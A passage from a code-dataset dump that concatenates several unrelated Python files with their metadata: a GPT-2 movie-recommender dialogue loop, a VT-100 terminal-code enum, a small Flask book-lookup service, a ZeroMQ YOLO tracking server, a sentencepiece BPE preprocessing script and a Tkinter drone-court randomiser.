\"P_ACTOR_\" in token:\n get_idx = token.split(\"P_ACTOR_\")\n has_actor = True\n else:\n has_actor = False\n \n if has_actor:\n if get_idx[0] != \"\":\n prev_word = get_idx[0]\n coref_text.append(prev_word)\n normal_token_counter += 1\n \n temp = get_idx[len(get_idx)-1].split(\"]\")\n\n idx = int(temp[0])\n if last_mentioned != []:\n if diff_turn < threshold_name:\n if debug_print:\n print(\"less than 2\")\n the_list = last_mentioned[0]\n actor_name = the_list[len(the_list)-1]\n temp_str = \"]\".join(temp[1:])\n if temp_str not in set(string.punctuation):\n temp_str = \" \"+temp_str\n coref_text.append(actor_name+temp_str)\n else:\n if debug_print:\n print(\"not less\")\n if i < len(actor_list):\n\n actor_name = actor_list[i]\n i += 1\n temp_str = \"]\".join(temp[1:])\n if temp_str not in set(string.punctuation):\n temp_str = \" \"+temp_str\n coref_text.append(actor_name + temp_str)\n if actor_name not in new_mentioned1:\n new_mentioned1[actor_name] = len(new_mentioned1)\n placeholder_id_to_text = {y:x for x,y in new_mentioned1.items()}\n else:\n coref_text.append(\"this actor\")\n \n elif idx in placeholder_id_to_text:\n if debug_print:\n print(\"it is in placeholder\")\n if diff_turn > threshold_name:\n if i < len(actor_list):\n\n actor_name = actor_list[i]\n i += 1\n temp_str = \"]\".join(temp[1:])\n if temp_str not in set(string.punctuation):\n temp_str = \" \"+temp_str\n coref_text.append(actor_name + temp_str)\n if actor_name not in new_mentioned1:\n new_mentioned1[actor_name] = len(new_mentioned1)\n placeholder_id_to_text = {y:x for x,y in new_mentioned1.items()}\n else: \n actor_name = placeholder_id_to_text[idx]\n if debug_print:\n print(\"here: \" + actor_name)\n temp_str = \"]\".join(temp[1:])\n if temp_str not in set(string.punctuation):\n temp_str = \" \"+temp_str\n coref_text.append(actor_name+temp_str)\n else:\n if i < len(actor_list):\n\n actor_name = actor_list[i]\n i += 1\n temp_str = \"]\".join(temp[1:])\n if temp_str not in set(string.punctuation):\n temp_str = \" \"+temp_str\n coref_text.append(actor_name + temp_str)\n if actor_name not in new_mentioned1:\n new_mentioned1[actor_name] = len(new_mentioned1)\n placeholder_id_to_text = {y:x for x,y in new_mentioned1.items()}\n \n actor_token_counter += 1\n \n else:\n coref_text.append(token)\n noncoref_text.append(token)\n normal_token_counter += 1\n \n actor2_token = 0\n actor_noncoref = []\n for token in tokenized_by_comma:\n if \"[MOVIE_P_ACTOR_\" in token:\n get_idx = token.split(\"[MOVIE_P_ACTOR_\")\n \n temp = get_idx[len(get_idx)-1].split(\"]\")\n if j >= len(actor_list):\n break\n another_actor_name = actor_list[j]\n actor_noncoref.append(another_actor_name+\"]\".join(temp[1:]))\n j += 1\n \n if another_actor_name not in new_mentioned2:\n new_mentioned2[another_actor_name] = len(new_mentioned2)\n \n actor2_token += 1\n \n else:\n normal_token_counter += 1\n \n if (normal_token_counter - actor_token_counter) >= 2 or (normal_token_counter - actor2_token) > 2 or actor_token_counter == 1:\n if debug_print:\n print(\"normal\")\n result = \" \".join(coref_text)\n return result, new_mentioned1\n else:\n if debug_print:\n print(\"nonnormal: actor2 token \" + str(actor2_token) + \" other: \" + str(normal_token_counter))\n print(\"noncoref: \" + str(noncoref_text))\n result = \", \".join(actor_noncoref)\n return result, new_mentioned2\n else:\n return text, mentioned_actors\n\ndef RemoveStrategyAndSEP(sentence):\n sent = re.sub(r'\\<[[a-z]*[_]*[[a-z]*\\>', \" \", sentence).strip()\n segment = sent.split(\"[SEP]\")\n return segment[0].strip()\n\ndef removeSEP(sentence):\n segment = sentence.split(\"[SEP]\")\n return segment[0].strip()\n\ndef CheckMoviePlot(tokenizer, response):\n\tcontain_movie_plot = False\n\tindex_movie_plot = tokenizer.encode(\"[MOVIE_PLOT]\")[0]\n\tif index_movie_plot in response:\n\t\tcontain_movie_plot = True\n\treturn contain_movie_plot\n\ndef similarity(candidate_rec_utt, last_rec_response):\n intersection = set(candidate_rec_utt).intersection(set(last_rec_response))\n overlap = len(intersection) / len(set(last_rec_response))\n return overlap\n\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"CUDA_INDEX\"\ndevice = torch.device(\"cuda\")\ndebug_print = False\n\nACTOR_TEMPLATES = [\"The movie has talented actors!\", \"The actors are really great.\", \"I like the actors!\"]\nMOVIE_PLOT_TEMPLATES = [\"The movie story is very interesting!\", \"It has interesting story.\", \"The plot is very interesting!\"]\n\nlabel_to_strategy = {0: 'no_strategy',\n 1: 'opinion_inquiry',\n 2: 'self_modeling',\n 3: 'personal_opinion',\n 4: 'credibility',\n 5: 'encouragement',\n 6: 'similarity',\n 7: 'rephrase_preference',\n 8: 'preference_confirmation',\n 9: 'experience_inquiry',\n 10: 'acknowledgment',\n 11: 'personal_experience',\n 12: 'offer_help'}\n\nlabel_to_recommendation = {0: 'not_recommendation', 1: 'recommendation'}\n\ngenre_from_tmdb = {28: \"action\", 12: \"adventure\", 16: \"animation\", 35: \"comedy\", 80: \"crime\", 99:\"documentary\", 18 : \"drama\"}\ngenre_from_tmdb[10751] = \"family\"\ngenre_from_tmdb[14] = \"fantasy\"\ngenre_from_tmdb[36] = \"history\"\ngenre_from_tmdb[27] = \"horror\"\ngenre_from_tmdb[10402] =\"music\"\ngenre_from_tmdb[9648] = \"mystery\"\ngenre_from_tmdb[10749] = \"romance\"\ngenre_from_tmdb[878] = \"sci-fi\"\ngenre_from_tmdb[10770] = \"tv movie\"\ngenre_from_tmdb[53] = \"thriller\"\ngenre_from_tmdb[10752] = \"war\"\ngenre_from_tmdb[37] = \"western\"\n\ntokenizer = torch.load(\"TOKENIZER_PATH\")\nmodel_A_states, model_B_states = torch.load(\"MODEL_PATH\")\n\nconfig = GPT2Config()\nconfig.vocab_size = model_A_states[\"transformer.wte.weight\"].shape[0]\nmodel_A = GPT2LMHeadModel(config)\nmodel_B = GPT2LMHeadModel(config)\n\nmodel_A.load_state_dict(model_A_states)\nmodel_B.load_state_dict(model_B_states)\nmodel_A.to(device)\nmodel_B.to(device)\n\nmodel_A_states[\"transformer.wte.weight\"].shape\n\nstrategy_detector = torch.load(\"STRATEGY_CLS_MODEL_Path\")\nrecommendation_detector = torch.load(\"RECOMMENDATION_CLS_MODEL_PATH\")\n\nbert_tokenizer = BertTokenizer.from_pretrained(\"bert-base-uncased\", num_labels = 13)\n\nstrategy_detector.eval()\nrecommendation_detector.eval()\nmodel_A.eval()\nmodel_B.eval()\n\nprev_input_for_recommender = tokenizer.encode(\"A:\")\nprev_input_for_recommender = torch.LongTensor(prev_input_for_recommender).unsqueeze(0).to(device)\n\ncandidates_num = 3\nngram = 2\ntemperature = 0.8 \n\ntop_k = 400\ntop_p = 0.9\n\npast_for_recommender = None\n\n# sep = tokenizer.encode(\"\\n\\n\\n\")\nsep = [628, 198]\n\nmentioned_genres = {}\nmovie_mentioned = {}\nmentioned_actors = {}\nmentioned_people = {}\nmentioned_directors = {}\nfavorite = {\"genres\": [], \"movies\": [], \"actors\": []}\nalready_recommended = {}\ndisliked = {\"genres\": [], \"movies\": [], \"actors\": []}\npositive_last_mentioned_genre = \"\"\npositive_actor = \"\"\nlast_mentioned_attribute = \"\"\nlast_mentioned_movie = \"\"\nlast_mentioned_genre = \"\"\nlast_mentioned_actors = []\nkind_of_movie_question = False\nturn_counter = 0\n\nlast_rec_template = \"\"\nlast_rec_response = [-1]\nwhile True:\n \"Sampling based method\"\n \n with torch.no_grad():\n candidates_pool = []\n candidates_past_pool = []\n candidates_strategy = []\n candidates_recommendation = []\n \n # Sampling several candidates \n # (input: past memory from user model and input token(s); \n # output: one selected past memory for user model and one selected recommender response)\n for count in range(candidates_num):\n past = past_for_recommender\n prev_input = prev_input_for_recommender\n sent = []\n \n # Sampling one candidate\n for i in range(200):\n logits, past = model_A(prev_input, past=past)\n logits = logits[:, -1, :] / temperature\n logits = top_filtering(logits, top_k=top_k, top_p=top_p)\n probs = F.softmax(logits, -1)\n prev_input = torch.multinomial(probs, num_samples=1)\n prev_word = prev_input.item()\n\n if prev_word == 628:\n break\n else:\n sent.append(prev_word)\n # save candidate and corresponding past memory\n candidates_pool.append(sent)\n candidates_past_pool.append(past)\n\n # Use pretrained strategy classifier to detect the strategy of generated responses\n if past_for_recommender == None:\n start = True\n else:\n start = False\n for cand in candidates_pool:\n if start:\n hist_response = tokenizer.decode(cand)\n hist_response_tmp = \"[CLS]\" + \"A:\" + hist_response+ \"[SEP]\"\n hist_response = RemoveStrategyAndSEP(hist_response_tmp)\n \n else:\n cand_tmp = tokenizer.decode(cand)\n cand_clean = RemoveStrategyAndSEP(cand_tmp)\n cand_clean = \"A:\"+cand_clean\n previous_user_tmp = RemoveStrategyAndSEP(previous_user)\n hist_response = \"[CLS]\" + previous_user_tmp + \"[SEP]\" + cand_clean + \"[SEP]\"\n hist_response = bert_tokenizer.encode(hist_response)\n # Attention: there is no padding\n b_input_mask = [int(i>=0) for i in hist_response]\n\n with torch.no_grad():\n strategy_logits = strategy_detector(torch.tensor(hist_response).unsqueeze(0).to(device), token_type_ids=None, attention_mask=torch.tensor(b_input_mask).unsqueeze(0).to(device))\n recommendation_logits = recommendation_detector(torch.tensor(hist_response).unsqueeze(0).to(device), token_type_ids=None, attention_mask=torch.tensor(b_input_mask).unsqueeze(0).to(device))\n value, index = strategy_logits.max(-1)\n _, recommendation_index = recommendation_logits.max(-1)\n\n candidates_strategy.append(label_to_strategy[index.item()])\n candidates_recommendation.append(label_to_recommendation[recommendation_index.item()])\n \n # remove candidate if there is ngram overlapping\n for index, sample in enumerate(candidates_pool):\n block = nGramBlock(sample, ngram)\n if block:\n if debug_print:\n print(\"There is a duplicated \", ngram, \" gram.\")\n candidates_pool.pop(index)\n candidates_past_pool.pop(index)\n candidates_strategy.pop(index)\n candidates_recommendation.pop(index)\n \n # Select one candidate from the candidates and reset the intermediate data container\n selected_idx = -1\n if selected_idx not in range(len(candidates_pool)): \n selected_idx = random.randint(0, len(candidates_pool) - 1)\n\n #-------------- sentence length rules-----------------\n '''\n max_len = 0\n selected_idx_new = -1\n for temp_idx, candidate_rec_utt in enumerate(candidates_pool):\n tokenized_cand_rec_len = len(candidate_rec_utt)\n decoded_candidate = tokenizer.decode(candidate_rec_utt)\n tokenized_generation = removeSEP(decoded_candidate).lower().split(\" \")\n \n if debug_print:\n print(\"Candidate recommender's utterance: \" + decoded_candidate)\n print(candidate_rec_utt)\n if \"what\" in tokenized_generation and (\"kind\" in tokenized_generation or \"type\" in tokenized_generation or \"kinds\" in tokenized_generation or \"types\" in tokenized_generation) and (\"movies\" in tokenized_generation) and \"like\" in tokenized_generation:\n if debug_print:\n print(\"Has been asked\")\n continue\n candidate_rec_utt_noSEP = tokenizer.encode(removeSEP(decoded_candidate))\n if tokenized_cand_rec_len > max_len and similarity(candidate_rec_utt_noSEP, last_rec_response) < 0.5:\n max_len = tokenized_cand_rec_len\n selected_idx_new = temp_idx\n if not start and turn_counter <= 7:\n selected_idx = selected_idx_new\n if debug_print:\n print(\"----\")\n '''\n #-------------- sentence length rules-----------------\n\n # setup past memory for recommender model and seeker model \n past = candidates_past_pool[selected_idx]\n sent = candidates_pool[selected_idx]\n recommendation_label = candidates_recommendation[selected_idx]\n turn_counter += 1\n if debug_print:\n print(\"Recommendation label: \" + str(recommendation_label))\n assert(len(candidates_past_pool) == len(candidates_pool) == len(candidates_strategy) == len(candidates_recommendation))\n\n generated_sent = tokenizer.decode(sent)\n generated_sent = remove_duplicate_movie_plots(generated_sent)\n\n #check type of question asked\n tokenized_generation = generated_sent.lower().split(\" \")\n if \"what\" in tokenized_generation and (\"kind\" in tokenized_generation or \"type\" in tokenized_generation or \"kinds\" in tokenized_generation or \"types\" in tokenized_generation) and (\"movies\" in tokenized_generation) and \"like\" in tokenized_generation:\n kind_of_movie_question=True\n \n proposed_genres = []\n\n if debug_print:\n print(\"Already recommended: \" + str(already_recommended.keys()))\n template_genre = \"action\"\n if last_mentioned_movie != \"\":\n if last_mentioned_movie in title_to_id and title_to_id[last_mentioned_movie] in valid_id:\n template_genre = valid_id[title_to_id[last_mentioned_movie]][\"genre\"].split(\", \")[0].lower()\n else:\n tokenized_title = last_mentioned_movie.split(\" \")\n if len(tokenized_title)>1:\n title = \"+\".join(tokenized_title[:len(tokenized_title)-1])\n else:\n title = last_mentioned_movie\n the_url = \"https://api.themoviedb.org/3/search/movie?api_key={}&query={}\".format(TMDB_KEY, title)\n movie_json = urlopen(the_url).read().decode('utf8')\n movie_info = json.loads(movie_json)\n results = movie_info['results']\n\n if len(results) > 0:\n tmdb_genre = results[0]['genre_ids'][0]\n template_genre = genre_from_tmdb[tmdb_genre]\n\n if debug_print:\n print(\"template genre: \" + str(template_genre))\n generated_sent, mentioned_genres, last_mentioned_genre = convert_back(generated_sent, mentioned_genres, proposed_genres, case=\"GENRE\", template_movie=None, template_genre=template_genre)\n \n if debug_print:\n print(\"mentioned genres: \" + str(mentioned_genres))\n if \"TITLE_\" in generated_sent:\n if positive_last_mentioned_genre == \"\":\n if \"[SEP]\" in generated_sent and \"genre: \" in generated_sent:\n temp = generated_sent.split(\"genre: \")\n temp2 = temp[len(temp)-1].split(\";\")\n positive_last_mentioned_genre = \"family\"\n if temp2[0].strip() != \"\":\n positive_last_mentioned_genre = temp2[0].strip()\n else:\n if mentioned_genres != {}:\n positive_last_mentioned_genre = last_mentioned_genre #mentioned_genres[len(mentioned_genres)-1]\n else:\n positive_last_mentioned_genre = \"comedy\"\n else:\n if mentioned_genres != {}:\n positive_last_mentioned_genre = last_mentioned_genre #mentioned_genres[len(mentioned_genres)-1]\n else:\n positive_last_mentioned_genre = \"comedy\"\n if debug_print:\n print(\"Positive last mentioned genre: \" + str(positive_last_mentioned_genre))\n\n recommendations, already_recommended = give_recommendation(favorite, positive_last_mentioned_genre, positive_actor, last_mentioned_attribute, already_recommended)\n if debug_print:\n print(\"recommendations: \" + str(recommendations))\n if recommendation_label == \"not_recommendation\":\n generated_sent, movie_mentioned, last_mentioned_movie = convert_back(generated_sent, movie_mentioned, recommendations, case=\"TITLE\",template_movie=\"Joker (2019)\")\n else:\n if debug_print:\n print(\"here is force rec: \" + str(recommendation_label))\n template_rec = \"Joker (2019)\"\n \n if recommendations != []:\n \n for the_recommended_movie in recommendations:\n if the_recommended_movie not in already_recommended:\n template_rec = the_recommended_movie\n break\n generated_sent, movie_mentioned, last_mentioned_movie = force_rec(generated_sent, movie_mentioned, recommendations, template_movie=template_rec)\n if last_mentioned_movie not in already_recommended:\n already_recommended[last_mentioned_movie] = True\n if debug_print:\n print(\"Last mentioned movie debugging: \" + last_mentioned_movie)\n generated_sent = get_movie_plot(generated_sent, last_mentioned_movie)\n\n generated_sent, mentioned_actors = replace_actors(generated_sent, last_mentioned_movie, mentioned_actors, last_mentioned_actors, turn_counter)\n\n if debug_print:\n print(\"Last mentioned movie attribute: \" + last_mentioned_attribute) \n print(\"RECOMMENDER: \" + generated_sent)\n \n last_rec_response = tokenizer.encode(generated_sent)\n \n # finish tail\n prev_input = torch.LongTensor(sep).unsqueeze(0).to(device)\n _, past = model_A(prev_input, past=past)\n \n # input and update B's utterance\n user = input(\"SEEKER: \")\n if user == \"quit\":\n break\n \n sentiment_label = get_sentiment(user.lower())\n if debug_print:\n print(\"Sentiment label: \" + sentiment_label)\n text_with_placeholder, movie_in_text, movie_mentioned = create_movie_slot(generated_sent, user, movie_mentioned)\n if debug_print:\n print(\"movie_mentioned: \" + str(movie_mentioned))\n user_with_genre, mentioned_genre_dict, genre_list = label_genre(text_with_placeholder, mentioned_genres)\n user_utt = user_with_genre\n \n if movie_in_text != \"\":\n user_utt = add_SEP(user_with_genre, movie_in_text.split(\"; \"), case=\"movie\")\n last_mentioned_attribute = \"movie\"\n if sentiment_label != \"negative\":\n favorite[\"movies\"] += movie_in_text.split(\"; \")\n \n last_mentioned_movie = favorite[\"movies\"][len(favorite[\"movies\"])-1]\n if debug_print:\n print(favorite)\n \n if genre_list != []:\n user_utt = add_SEP(user_utt, genre_list)\n if sentiment_label != \"negative\":\n favorite[\"genres\"] += genre_list\n if debug_print:\n print(favorite)\n positive_last_mentioned_genre = genre_list[len(genre_list)-1]\n last_mentioned_attribute = \"genre\"\n \n\n user_utt, people_names, mentioned_actors, mentioned_people, mentioned_directors = find_name(user_utt, name_list, mentioned_actors, mentioned_directors, {})\n if debug_print:\n print(\"user utt: \" + str(user_utt))\n if people_names != []:\n user_utt = add_SEP(user_utt, people_names, case=\"people_name\")\n last_mentioned_attribute = \"actor\"\n last_mentioned_actors = [people_names, turn_counter]\n if sentiment_label != \"negative\":\n positive_actor = people_names[len(people_names)-1]\n \n if debug_print:\n print(last_mentioned_attribute)\n print(\"processed: \" + user_utt + \" last REC: \" + generated_sent)\n \n previous_user = \"B:\" + user_utt\n # print(\"The input of user model: \", previous_user)\n\n user = tokenizer.encode(\"B:\" + user_utt)\n prev_input = user + sep\n prev_input = torch.LongTensor(prev_input).unsqueeze(0).to(device)\n \n # seeker \n _, past = model_B(prev_input, past=past)\n \n # start A's utterance\n suffix = tokenizer.encode(\"A: \")\n prev_input = torch.LongTensor(suffix).unsqueeze(0).to(device)\n \n # recode the prev_input and past for recommender\n past_for_recommender = past\n prev_input_for_recommender = prev_input\n\n\n","sub_path":"code/interactive.py","file_name":"interactive.py","file_ext":"py","file_size_in_byte":69901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"91918061","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\n TODO Purpose of the file\n @project: HSPyLib\n hspylib.main.hspylib.modules.cli.vt100\n @file: vt_codes.py\n @created: Tue, 4 May 2021\n @author: Hugo Saporetti Junior\"\n @site: https://github.com/yorevs/hspylib\n @license: MIT - Please refer to \n\n Copyright 2021, HSPyLib team\n\"\"\"\n\nimport re\nfrom enum import auto\n\nfrom hspylib.core.enums.enumeration import Enumeration\nfrom hspylib.modules.cli.vt100.vt_100 import Vt100\n\n\ndef vt_print(vt100_str: str, end: str = '') -> None:\n \"\"\"Print a vt-100 encoded string. VT-100 string will contain one or more %VT-100-CODE% \"\"\"\n print(VtCodes.decode(vt100_str), end=end)\n\n\nclass VtCodes(Enumeration):\n \"\"\"VT-100 escape codes\"\"\"\n\n # @formatter:off\n CSV = Vt100.save_cursor() # ^[7 -> Save cursor position and attributes\n CRE = Vt100.restore_cursor() # ^[8 -> Restore cursor position and attributes\n RIS = Vt100.reset() # ^[c -> Reset terminal to initial state\n\n SAW = Vt100.set_auto_wrap(True) # ^[?7h -> Set auto-wrap mode\n UAW = Vt100.set_auto_wrap(False) # ^[?7l -> Unset auto-wrap mode\n SSC = Vt100.set_show_cursor(True) # ^[?25h -> Set show cursor\n USC = Vt100.set_show_cursor(False) # ^[?25l -> Unset show cursor\n\n ED0 = Vt100.clear_screen() # ^[[J -> Clear screen from cursor down\n ED1 = Vt100.clear_screen(1) # ^[[1J -> Clear screen from cursor up\n ED2 = Vt100.clear_screen(2) # ^[[2J -> Clear entire screen\n\n EL0 = Vt100.clear_line() # ^[[K -> Clear line from cursor right\n EL1 = Vt100.clear_line(1) # ^[[1K -> Clear line from cursor left\n EL2 = Vt100.clear_line(2) # ^[[2K -> Clear entire line\n\n HOM = Vt100.cursor_pos() # ^[[H -> Move cursor to upper left corner\n\n # The following entries must defined as auto(), so they can be invoked as Callable\n\n MOD = auto() # ^[[m -> Set terminal modes\n CUP = auto() # ^[[;H -> Move cursor to screen location \n CUU = auto() # ^[[A -> Move cursor up n lines\n CUD = auto() # ^[[B -> Move cursor down n lines\n CUF = auto() # ^[[C -> Move cursor right n lines\n CUB = auto() # ^[[D -> Move cursor left n lines\n # @formatter:on\n\n # For all mnemonics that take arguments we need to include in this map, so we can call it\n __VT100_FNC_MAP__ = {\n \"MOD\": Vt100.mode,\n \"CUP\": Vt100.cursor_pos,\n \"CUU\": Vt100.cursor_move_up,\n \"CUD\": Vt100.cursor_move_down,\n \"CUF\": Vt100.cursor_move_forward,\n \"CUB\": Vt100.cursor_move_backward,\n }\n\n @classmethod\n def decode(cls, input_string: str) -> str:\n \"\"\"Decode the string into a VT_CODE enum\"\"\"\n results = re.findall(r'%([a-zA-Z0-9]+)(\\([0-9]+(;[0-9]+)*\\))?%', input_string)\n for nextResult in results:\n mnemonic = nextResult[0]\n if mnemonic in VtCodes.names():\n args = nextResult[1][1:-1] if nextResult[1] else ''\n if args:\n input_string = input_string.replace(\n '%{}%'.format(mnemonic + nextResult[1]), VtCodes.value_of(mnemonic)(args))\n else:\n input_string = input_string.replace(\n '%{}%'.format(mnemonic), VtCodes.value_of(mnemonic).value)\n\n return input_string\n\n def __call__(self, *args, **kwargs) -> str:\n return VtCodes.__VT100_FNC_MAP__[self.name](args[0])\n\n def __str__(self) -> str:\n return str(self.value)\n\n def code(self) -> str:\n \"\"\"Decode the string into a VT_CODE enum\"\"\"\n return str(self)\n\n def placeholder(self) -> str:\n \"\"\"Decode the string into a VT_CODE enum\"\"\"\n return f\"%{self.name}%\"\n","sub_path":"src/main/hspylib/modules/cli/vt100/vt_codes.py","file_name":"vt_codes.py","file_ext":"py","file_size_in_byte":4046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"275021582","text":"from flask import Flask, make_response, jsonify, request\nfrom flask_restful import Api, Resource, reqparse\nfrom service import Library\nfrom model import Book\n\napp = Flask(__name__)\napi = Api(app)\nlibrary = Library()\n\n@app.route(\"/library/book/\", methods=['GET'])\ndef find(isbn):\n try:\n book = library.find(isbn)\n response = make_response(jsonify({\n \"isbn\": book.isbn,\n \"title\": book.title,\n \"price\": book.price\n }))\n response.headers.add('Access-Control-Allow-Origin', '*')\n return response\n except Exception as e:\n response = make_response(str(e), 404)\n response.headers.add('Access-Control-Allow-Origin', '*')\n return response\n\napp.run(host='0.0.0.0', port=5000, debug=True)\n","sub_path":"library-dockers/library-find-service/app/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"26143010","text":"\nimport time\nimport zmq\nimport cv2\nimport base64\nimport numpy as np\nfrom object_tracker import ObjectTracker\n\nfrom absl import app, flags, logging\nfrom absl.flags import FLAGS\n\n\n\nflags.DEFINE_string('classes', './data/labels/coco.names', 'path to classes file')\nflags.DEFINE_string('weights', './weights/yolov3.tf',\n 'path to weights file')\nflags.DEFINE_boolean('tiny', False, 'yolov3 or yolov3-tiny')\nflags.DEFINE_integer('size', 416, 'resize images to')\nflags.DEFINE_string('video', './data/video/test.mp4',\n 'path to video file or number for webcam)')\nflags.DEFINE_string('output', None, 'path to output video')\nflags.DEFINE_string('output_format', 'XVID', 'codec used in VideoWriter when saving video to file')\nflags.DEFINE_integer('num_classes', 80, 'number of classes in the model')\n\n\ncontext = zmq.Context()\nfootage_socket = context.socket(zmq.SUB)\nfootage_socket.bind('tcp://*:5555')\nfootage_socket.setsockopt_string(zmq.SUBSCRIBE, str(''))\n\nsocket = context.socket(zmq.REP)\nsocket.bind('tcp://*:5556')\n\ndef send_array(socket, A, flags=0, copy=True, track=False):\n md = dict(\n dtype = str(A.dtype),\n shape = A.shape,\n )\n socket.send_json(md, flags|zmq.SNDMORE)\n return socket.send(A, flags, copy=copy, track=track)\n\n\ndef main(_argv):\n\n object_tracker = ObjectTracker()\n frame = None \n\n while True:\n\t \n frame = footage_socket.recv_string()\n img = base64.b64decode(frame)\n npimg = np.fromstring(img, dtype=np.uint8)\n source = cv2.imdecode(npimg, 1)\n \n message = socket.recv() \n\n object_tracker.run(source)\n \n send_array(socket, np.array(object_tracker.get_last_tracked()))\n\n object_tracker.clear_last_tracked()\n \n\nif __name__ == '__main__':\n try:\n app.run(main)\n\n except SystemExit:\n pass\n\n\n\n\n\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"133104243","text":"# -*- coding: utf-8 -*-\n#/usr/bin/python3\n'''\nFeb. 2019 by kyubyong park.\nkbpark.linguist@gmail.com.\nhttps://www.github.com/kyubyong/transformer.\n\nPreprocess the iwslt 2016 datasets.\n'''\n\n#全文本位置:/data/234/UM-Corpus/data/Bilingual/allTex.txt\n\n\nimport os\nimport errno\nimport sentencepiece as spm\nimport re\n\nimport logging\n\nlogging.basicConfig(level=logging.CRITICAL)\n\nif 0:\n \"\"\"Load raw data -> Preprocessing -> Segmenting with sentencepice\n hp: hyperparams. argparse.\n \"\"\"\n print('kaishi')\n if not os.path.exists('中英文bpe模型'):\n os.mkdir('中英文bpe模型')\n logging.info(\"# Train a joint BPE model with sentencepiece\")\n #train参数是, unk id,bos id, eos id设置好即可.\n train = '--input=/data/234/UM-Corpus/data/Bilingual/Bi-Education.txt --pad_id=0 --unk_id=1 \\\n --bos_id=2 --eos_id=3\\\n --model_prefix=中英文bpe模型/bpe --vocab_size={} \\\n --model_type=bpe '.format(32000)\n spm.SentencePieceTrainer.Train(train)\n print('完成训练了!')\n logging.info(\"# Load trained bpe model\")\n sp = spm.SentencePieceProcessor()\n sp.Load(\"中英文bpe模型/bpe.model\")\n print(sp.EncodeAsPieces('dsjafljdsl,我是一个人'))\n\nif 0:\n sp = spm.SentencePieceProcessor()\n sp.Load(\"中英文bpe模型/bpe.model\")\n print(sp.EncodeAsPieces('dsjafljdsl,我是一个人客结合线上线下大数据,线上通过运营商强大的数据挖掘能力,多方位精准锁定用户。线下通过场景大数据,依托智能硬件与大数据,汇集海量移动媒体和终端资源,为企业提供移动互联网精准营销与大数据应用服务'))\n _prepro = lambda x: [line.strip() for line in open(x, 'r').read().split(\"\\n\") ]\n prepro_train1 = _prepro('/data/234/UM-Corpus/data/Bilingual/Bi-Education.txt')\n\n def _segment_and_write(sents, fname):\n with open(fname, \"w\") as fout:\n for sent in sents:\n pieces = sp.EncodeAsPieces(sent)\n fout.write(\" \".join(pieces) + \"\\n\")\n _segment_and_write(prepro_train1, \"chineseEnglishData.bpe\")\n ##这个文件chineseEnglishData.bpe就是训练集了.\n\n #在根据奇偶行拆分batch训练即可.然后根据同目录里面的.vocab进行编码\n\n\n #然后得到的分词,进入对应的vocab里面去查询即可.\n\nif 1:\n #把中英文bpe模型/bpe.vocab变成字典\n from collections import defaultdict\n dicA=defaultdict(int)\n with open('中英文bpe模型/bpe.vocab') as t:\n tmp= t.readlines()\n for i in range(len(tmp)):\n\n a=tmp[i].strip('\\n').split('\\t')\n dicA[a[0]]=a[1]\n print(dicA)\n\n sp = spm.SentencePieceProcessor()\n sp.Load(\"中英文bpe模型/bpe.model\")\n print(sp.EncodeAsPieces('dsjafljdsl,我是一个人客结合线上线下大数据,线上通过运营商强大的数据挖掘能力,多方位精准锁定用户。线下通过场景大数据,依托智能硬件与大数据,汇集海量移动媒体和终端资源,为企业提供移动互联网精准营销与大数据应用服务'))\n _prepro = lambda x: [line.strip() for line in open(x, 'r').read().split(\"\\n\")]\n prepro_train1 = _prepro('/data/234/UM-Corpus/data/Bilingual/Bi-Education.txt')\n\n\n def _segment_and_write(sents, fname):\n with open(fname, \"w\") as fout:\n for sent in sents:\n pieces = sp.EncodeAsPieces(sent)\n pieces=[str(dicA[i]) for i in pieces]\n fout.write(\" \".join(pieces) + \"\\n\")\n\n\n _segment_and_write(prepro_train1, \"chineseEnglishDataCoded.bpe\")\n#跑完了,以后就用这个chineseEnglishDataCoded.bpe 这个编码后的进行学习了.","sub_path":"prepro生成字典的代码2.py","file_name":"prepro生成字典的代码2.py","file_ext":"py","file_size_in_byte":3695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"486393792","text":"\n\nimport random as rd\nimport tkinter as tk\nimport threading\nimport time\nfrom PIL import ImageGrab # do pip3 install pillow\nfrom PIL import Image\n\nHEIGHT = 768\nWIDTH = 360\n\nclass RandomCourt:\n def __init__(self):\n self.choice = [0, 1, 2, 3, 4]\n self.parking_or_hoop = [] # ['parking', 'hoop', ...]\n self.pos_to_put = [] # [1, 0, 3, 4, ...] max 4, min 0\n self.pos_with_tree = []\n self.tree_with_code = []\n\n\n def random(self):\n self._set_parking_or_hoop()\n self._set_pos_to_put()\n self._set_tree_pos()\n\n def _set_parking_or_hoop(self):\n line_all = ['parking', 'parking', 'parking']\n line_3_8 = ['hoop', 'hoop', 'hoop', 'parking', 'parking', 'parking']\n rd.shuffle(line_3_8)\n [line_all.insert(2, x) for x in line_3_8]\n self.parking_or_hoop = line_all\n\n def _set_pos_to_put(self):\n self.pos_to_put.clear()\n for _ in range(9):\n self.pos_to_put.append(rd.choice(self.choice))\n\n def _set_tree_pos(self):\n tree = []\n for i in range(12):\n tree.append(i)\n rd.shuffle(tree)\n self.pos_with_tree = tree[:10]\n self.tree_with_code = tree[:5]\n\n def ran_print(self):\n self.random()\n print(self.parking_or_hoop)\n print(self.pos_to_put)\n print(self.pos_with_tree)\n print(self.tree_with_code)\n\nclass Window:\n def __init__(self):\n #random thing\n self.randomcourt = RandomCourt()\n self.randomflag = False\n self.randomfreq = 0.1\n\n #GUI\n self.root = tk.Tk()\n self.root.title('无人机场地')\n self.root.geometry(\"600x800+300+20\") # on Mac x is 117 + ~ y is 25 + ~\n\n\n self.frame = tk.Frame(self.root, width=WIDTH)\n self.canvas = tk.Canvas(self.root, width=WIDTH, height=HEIGHT, background='grey')\n self.randombutton = tk.Button(self.frame, text='开始随机', command=self.startrandom)\n self.stopbutton = tk.Button(self.frame, text='停止随机', command=self.stoprandom)\n self.confirmbutton = tk.Button(self.frame, text='确定场地', command=self.confirmcourt)\n\n #draw\n self.coef = WIDTH / 15 # hard code, 450->width\n 